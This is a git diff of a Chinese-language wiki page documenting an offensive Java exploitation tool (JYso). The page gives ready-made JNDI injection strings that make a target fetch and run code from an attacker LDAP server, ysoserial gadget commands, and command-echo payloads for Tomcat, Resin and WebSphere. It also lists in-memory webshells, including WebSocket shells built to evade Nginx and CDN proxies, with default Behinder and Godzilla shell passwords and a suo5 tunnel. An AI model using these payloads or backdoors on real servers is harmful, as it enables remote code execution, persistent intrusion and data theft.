Updated JYso‐CN (markdown)

炁
2024-06-06 09:41:29 +08:00
parent 2cf19ec27a
commit aa843527ca
+10 -6
@@ -171,8 +171,9 @@ http://127.0.0.1:3456/setRoute?a=Deserialization/CommonsCollections6/command/Bas
- 命令 `EX-ResinEcho`:Resin 命令执行回显
- 命令 `EX-WebsphereEcho`:websphere 命令执行回显
在回显类前面加大写C即是构造方法实现,反之则在静态代码块中,例如
在回显类前面加大写C即是构造方法实现,反之则在静态代码块中,加这个的原因是重名类静态代码加载只会执行一次。
例如
```
${jndi:ldap://127.0.0.1:1389/TomcatBypass/M-EX-CTomcatEcho}
```
@@ -194,7 +195,6 @@ ${jndi:ldap://127.0.0.1:1389/TomcatBypass/M-EX-TomcatEcho}
```
${jndi:ldap://127.0.0.1:1389/TomcatBypass/M-EX-TomcatEcho/shell/LWNoIENvb2tpZXNz}
```
+ ysoserial
```
java -jar JYso-[version].jar -y -g [Gadget] -p "EX-TomcatEcho"
@@ -262,6 +262,8 @@ rmi://127.0.0.1:1099/M-EX-MS-RFMSFromThreadF-..#params
java -jar JYso-[version].jar -y -g [Gadget] -p "[EX-MS-MemShellClass]"
```
---
* ```cmsMSBYNC```: 绕过Nginx、CDN代理限制的 WebSocket 马,路径`/x`
* ```proxyMSBYNC```: 绕过Nginx、CDN代理限制的 WebSocket 马,路径`/x`
* ```WsResin```: 适配 Resin 的 WebSocket 马,请求头中`Upgrade: websocket`
@@ -270,9 +272,11 @@ java -jar JYso-[version].jar -y -g [Gadget] -p "[EX-MS-MemShellClass]"
* ```WsWeblogic```: 适配 Weblogic 的 WebSocket 马,路径`/path`
* ```WSWebsphereProxy```: 适配 Websphere 的 WebSocket 马,路径`/path`
对于这些没经过javassist,可以通过 `E-MsTSJproxy` 的方式直接加载
+ JNDI-Injection-Exploit 用法:
```
ldap://127.0.0.1:1389/[Basic or TomcatBypass]/[E-MemShellClass]
ldap://127.0.0.1:1389/[TomcatBypass]/[E-MemShellClass]
```
```
@@ -291,15 +295,15 @@ java -jar JYso-[version].jar -y -g [Gadget] -p "[EX-MemShellClass]"
1. 如果是 **CMD** 内存马,程序会从 `X-Token-Data` 中读取待执行的命令,并将执行结果进行回显,这个头部可以通过 `-ch "testecho"` 来指定。
![](https://gallery-1304405887.cos.ap-nanjing.myqcloud.com/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20240529163056.png)
![](https://gallery-1304405887.cos.ap-nanjing.myqcloud.com/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20240529163056.png)
2. 如果是 **冰蝎** Shell 内存马,可使用冰蝎客户端进行连接管理,密码 `p@ssw0rd`, 可以通过 `-pw "1qaz@WSX"` 来指定。
![](https://gallery-1304405887.cos.ap-nanjing.myqcloud.com/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20240530103348.png)
![](https://gallery-1304405887.cos.ap-nanjing.myqcloud.com/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20240530103348.png)
3. 如果是 **哥斯拉** shell 内存马,可使用哥斯拉客户端进行连接管理,pass 值设为 `p@ssw0rd`,key 设为 `key`,哥斯拉内存马同时支持了 RAW 和 Base64,可以通过 `-pw "1qaz@WSX" -gzk "evilkey"` 来指定。
![](https://gallery-1304405887.cos.ap-nanjing.myqcloud.com/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20240529182352.png)
![](https://gallery-1304405887.cos.ap-nanjing.myqcloud.com/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20240529182352.png)
4. 如果是 **suo5** 内存马,则会直接创建一个 suo5 隧道,可以直接由 suo5 客户端进行连接,suo5 目前对支持了对自定义 Header 头部进行鉴权,生成时可以通过参数 `-hk "User-Agent" -hv "aaaawww"` 指定,如下可正常连接: